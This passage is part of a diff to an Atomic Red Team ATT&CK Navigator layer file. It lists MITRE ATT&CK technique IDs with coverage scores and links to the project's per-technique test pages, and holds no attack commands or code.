re":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T
1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"
techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571",
"score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techn
iqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://
github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master
/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/bl
ob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryc
o/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/
